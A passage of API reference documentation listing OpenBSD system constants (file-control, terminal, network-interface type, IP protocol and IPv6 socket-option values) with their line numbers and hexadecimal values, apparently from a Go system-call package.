(line 544) | EXTA = 0x4b00 constant EXTB (line 545) | EXTB = 0x9600 constant EXTPROC (line 546) | EXTPROC = 0x800 constant FD_CLOEXEC (line 547) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 548) | FD_SETSIZE = 0x400 constant FLUSHO (line 549) | FLUSHO = 0x800000 constant F_DUPFD (line 550) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 551) | F_DUPFD_CLOEXEC = 0xa constant F_GETFD (line 552) | F_GETFD = 0x1 constant F_GETFL (line 553) | F_GETFL = 0x3 constant F_GETLK (line 554) | F_GETLK = 0x7 constant F_GETOWN (line 555) | F_GETOWN = 0x5 constant F_ISATTY (line 556) | F_ISATTY = 0xb constant F_OK (line 557) | F_OK = 0x0 constant F_RDLCK (line 558) | F_RDLCK = 0x1 constant F_SETFD (line 559) | F_SETFD = 0x2 constant F_SETFL (line 560) | F_SETFL = 0x4 constant F_SETLK (line 561) | F_SETLK = 0x8 constant F_SETLKW (line 562) | F_SETLKW = 0x9 constant F_SETOWN (line 563) | F_SETOWN = 0x6 constant F_UNLCK (line 564) | F_UNLCK = 0x2 constant F_WRLCK (line 565) | F_WRLCK = 0x3 constant HUPCL (line 566) | HUPCL = 0x4000 constant HW_MACHINE (line 567) | HW_MACHINE = 0x1 constant ICANON (line 568) | ICANON = 0x100 constant ICMP6_FILTER (line 569) | ICMP6_FILTER = 0x12 constant ICRNL (line 570) | ICRNL = 0x100 constant IEXTEN (line 571) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 572) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 573) | IFAN_DEPARTURE = 0x1 constant IFF_ALLMULTI (line 574) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 575) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 576) | IFF_CANTCHANGE = 0x8e52 constant IFF_DEBUG (line 577) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 578) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 579) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 580) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 581) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 582) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 583) | IFF_NOARP = 0x80 constant IFF_OACTIVE (line 584) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 585) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 586) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 587) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 588) | IFF_SIMPLEX = 0x800 constant IFF_STATICARP (line 589) | IFF_STATICARP = 0x20 constant IFF_UP (line 590) | IFF_UP = 0x1 constant IFNAMSIZ (line 591) | IFNAMSIZ = 0x10 constant IFT_1822 (line 592) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 593) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 594) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 595) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 596) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 597) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 598) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 599) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 600) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 601) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 602) | IFT_ASYNC = 0x54 constant IFT_ATM (line 603) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 604) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 605) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 606) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 607) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 608) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 609) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 610) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 611) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 612) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BLUETOOTH (line 613) | IFT_BLUETOOTH = 0xf8 constant IFT_BRIDGE (line 614) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 615) | IFT_BSC = 0x53 constant IFT_CARP (line 616) | IFT_CARP = 0xf7 constant IFT_CCTEMUL (line 617) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 618) | IFT_CEPT = 0x13 constant IFT_CES (line 619) | IFT_CES = 0x85 constant IFT_CHANNEL (line 620) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 621) | IFT_CNR = 0x55 constant IFT_COFFEE (line 622) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 623) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 624) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 625) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 626) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 627) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 628) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 629) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 630) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 631) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 632) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 633) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 634) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 635) | IFT_DS3 = 0x1e constant IFT_DTM (line 636) | IFT_DTM = 0x8c constant IFT_DUMMY (line 637) | IFT_DUMMY = 0xf1 constant IFT_DVBASILN (line 638) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 639) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 640) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 641) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 642) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 643) | IFT_ECONET = 0xce constant IFT_ENC (line 644) | IFT_ENC = 0xf4 constant IFT_EON (line 645) | IFT_EON = 0x19 constant IFT_EPLRS (line 646) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 647) | IFT_ESCON = 0x49 constant IFT_ETHER (line 648) | IFT_ETHER = 0x6 constant IFT_FAITH (line 649) | IFT_FAITH = 0xf3 constant IFT_FAST (line 650) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 651) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 652) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 653) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 654) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 655) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 656) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 657) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 658) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 659) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 660) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 661) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 662) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 663) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 664) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 665) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 666) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 667) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 668) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 669) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 670) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 671) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 672) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 673) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 674) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 675) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 676) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 677) | IFT_HSSI = 0x2e constant IFT_HY (line 678) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 679) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 680) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 681) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 682) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 683) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 684) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 685) | IFT_IFGSN = 0x91 constant IFT_IMT (line 686) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 687) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 688) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 689) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 690) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 691) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 692) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 693) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 694) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 695) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 696) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 697) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 698) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 699) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 700) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 701) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 702) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 703) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 704) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 705) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 706) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 707) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 708) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 709) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 710) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 711) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 712) | IFT_LAPB = 0x10 constant IFT_LAPD (line 713) | IFT_LAPD = 0x4d constant IFT_LAPF (line 714) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 715) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 716) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 717) | IFT_LOOP = 0x18 constant IFT_MBIM (line 718) | IFT_MBIM = 0xfa constant IFT_MEDIAMAILOVERIP (line 719) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 720) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 721) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 722) | IFT_MODEM = 0x30 constant IFT_MPC (line 723) | IFT_MPC = 0x71 constant IFT_MPLS (line 724) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 725) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 726) | IFT_MSDSL = 0x8f constant IFT_MVL (line 727) | IFT_MVL = 0xbf constant IFT_MYRINET (line 728) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 729) | IFT_NFAS = 0xaf constant IFT_NSIP (line 730) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 731) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 732) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 733) | IFT_OTHER = 0x1 constant IFT_P10 (line 734) | IFT_P10 = 0xc constant IFT_P80 (line 735) | IFT_P80 = 0xd constant IFT_PARA (line 736) | IFT_PARA = 0x22 constant IFT_PFLOG (line 737) | IFT_PFLOG = 0xf5 constant IFT_PFLOW (line 738) | IFT_PFLOW = 0xf9 constant IFT_PFSYNC (line 739) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 740) | IFT_PLC = 0xae constant IFT_PON155 (line 741) | IFT_PON155 = 0xcf constant IFT_PON622 (line 742) | IFT_PON622 = 0xd0 constant IFT_POS (line 743) | IFT_POS = 0xab constant IFT_PPP (line 744) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 745) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 746) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 747) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 748) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 749) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 750) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 751) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 752) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 753) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 754) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 755) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 756) | IFT_PVC = 0xf2 constant IFT_Q2931 (line 757) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 758) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 759) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 760) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 761) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 762) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 763) | IFT_RS232 = 0x21 constant IFT_RSRB (line 764) | IFT_RSRB = 0x4f constant IFT_SDLC (line 765) | IFT_SDLC = 0x11 constant IFT_SDSL (line 766) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 767) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 768) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 769) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 770) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 771) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 772) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 773) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 774) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 775) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 776) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 777) | IFT_SONETVT = 0x33 constant IFT_SRP (line 778) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 779) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 780) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 781) | IFT_STARLAN = 0xb constant IFT_T1 (line 782) | IFT_T1 = 0x12 constant IFT_TDLC (line 783) | IFT_TDLC = 0x74 constant IFT_TELINK (line 784) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 785) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 786) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 787) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 788) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 789) | IFT_ULTRA = 0x1d constant IFT_USB (line 790) | IFT_USB = 0xa0 constant IFT_V11 (line 791) | IFT_V11 = 0x40 constant IFT_V35 (line 792) | IFT_V35 = 0x2d constant IFT_V36 (line 793) | IFT_V36 = 0x41 constant IFT_V37 (line 794) | IFT_V37 = 0x78 constant IFT_VDSL (line 795) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 796) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 797) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 798) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 799) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 800) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 801) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 802) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 803) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 804) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 805) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 806) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 807) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 808) | IFT_VOICEOVERIP = 0x68 constant IFT_WIREGUARD (line 809) | IFT_WIREGUARD = 0xfb constant IFT_X213 (line 810) | IFT_X213 = 0x5d constant IFT_X25 (line 811) | IFT_X25 = 0x5 constant IFT_X25DDN (line 812) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 813) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 814) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 815) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 816) | IFT_XETHER = 0x1a constant IGNBRK (line 817) | IGNBRK = 0x1 constant IGNCR (line 818) | IGNCR = 0x80 constant IGNPAR (line 819) | IGNPAR = 0x4 constant IMAXBEL (line 820) | IMAXBEL = 0x2000 constant INLCR (line 821) | INLCR = 0x40 constant INPCK (line 822) | INPCK = 0x10 constant IN_CLASSA_HOST (line 823) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 824) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 825) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 826) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 827) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 828) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 829) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 830) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 831) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 832) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 833) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 834) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 835) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 836) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 837) | IN_LOOPBACKNET = 0x7f constant IN_RFC3021_HOST (line 838) | IN_RFC3021_HOST = 0x1 constant IN_RFC3021_NET (line 839) | IN_RFC3021_NET = 0xfffffffe constant IN_RFC3021_NSHIFT (line 840) | IN_RFC3021_NSHIFT = 0x1f constant IPPROTO_AH (line 841) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 842) | IPPROTO_CARP = 0x70 constant IPPROTO_DIVERT (line 843) | IPPROTO_DIVERT = 0x102 constant IPPROTO_DONE (line 844) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 845) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 846) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 847) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 848) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 849) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 850) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 851) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 852) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 853) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 854) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 855) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 856) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 857) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 858) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 859) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 860) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 861) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 862) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 863) | IPPROTO_IPV6 = 0x29 constant IPPROTO_MAX (line 864) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 865) | IPPROTO_MAXID = 0x103 constant IPPROTO_MOBILE (line 866) | IPPROTO_MOBILE = 0x37 constant IPPROTO_MPLS (line 867) | IPPROTO_MPLS = 0x89 constant IPPROTO_NONE (line 868) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 869) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 870) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 871) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 872) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 873) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 874) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 875) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 876) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 877) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 878) | IPPROTO_UDP = 0x11 constant IPPROTO_UDPLITE (line 879) | IPPROTO_UDPLITE = 0x88 constant IPV6_AUTH_LEVEL (line 880) | IPV6_AUTH_LEVEL = 0x35 constant IPV6_AUTOFLOWLABEL (line 881) | IPV6_AUTOFLOWLABEL = 0x3b constant IPV6_CHECKSUM (line 882) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 883) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 884) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 885) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 886) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 887) | IPV6_DSTOPTS = 0x32 constant IPV6_ESP_NETWORK_LEVEL (line 888) | IPV6_ESP_NETWORK_LEVEL = 0x37 constant IPV6_ESP_TRANS_LEVEL (line 889) | IPV6_ESP_TRANS_LEVEL = 0x36 constant IPV6_FAITH (line 890) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 891) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 892) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 893) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 894) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 895) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 896) | IPV6_HOPOPTS = 0x31 constant IPV6_IPCOMP_LEVEL (line 897) | IPV6_IPCOMP_LEVEL = 0x3c constant IPV6_JOIN_GROUP (line 898) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 899) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 900) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 901) | IPV6_MAXPACKET = 0xffff constant IPV6_MINHOPCOUNT (line 902) | IPV6_MINHOPCOUNT = 0x41 constant IPV6_MMTU (line 903) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 904) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 905) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 906) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 907) | IPV6_NEXTHOP = 0x30 constant IPV6_OPTIONS (line 908) | IPV6_OPTIONS = 0x1 constant IPV6_PATHMTU (line 909) | IPV6_PATHMTU = 0x2c constant IPV6_PIPEX (line 910) | IPV6_PIPEX = 0x3f constant IPV6_PKTINFO (line 911) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 912) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 913) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 914) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 915) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 916) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVDSTPORT (line 917) | IPV6_RECVDSTPORT = 0x40 constant IPV6_RECVHOPLIMIT (line 918) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 919) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 920) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 921) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 922) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 923) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTABLE (line 924) | IPV6_RTABLE = 0x1021 constant IPV6_RTHDR (line 925) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 926) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 927) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 928) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 929) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 930) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 931) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 932) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 933) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 934) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 935) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 936) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 937) | IP_ADD_MEMBERSHIP = 0xc constant IP_AUTH_LEVEL (line 938) | IP_AUTH_LEVEL = 0x14 constant IP_DEFAULT_MULTICAST_LOOP (line 939) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 940) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 941) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 942) | IP_DROP_MEMBERSHIP = 0xd constant IP_ESP_NETWORK_LEVEL (line 943) | IP_ESP_NETWORK_LEVEL = 0x16 constant IP_ESP_TRANS_LEVEL (line 944) | IP_ESP_TRANS_LEVEL = 0x15 constant IP_HDRINCL (line 945) | IP_HDRINCL = 0x2 constant IP_IPCOMP_LEVEL (line 946) | IP_IPCOMP_LEVEL = 0x1d constant IP_IPDEFTTL (line 947) | IP_IPDEFTTL = 0x25 constant IP_IPSECFLOWINFO (line 948) | IP_IPSECFLOWINFO = 0x24 constant IP_IPSEC_LOCAL_AUTH (line 949) | IP_IPSEC_LOCAL_AUTH = 0x1b constant IP_IPSEC_LOCAL_CRED (line 950) | IP_IPSEC_LOCAL_CRED = 0x19 constant IP_IPSEC_LOCAL_ID (line 951) | IP_IPSEC_LOCAL_ID = 0x17 constant IP_IPSEC_REMOTE_AUTH (line 952) | IP_IPSEC_REMOTE_AUTH = 0x1c constant IP_IPSEC_REMOTE_CRED (line 953) | IP_IPSEC_REMOTE_CRED = 0x1a constant IP_IPSEC_REMOTE_ID (line 954) | 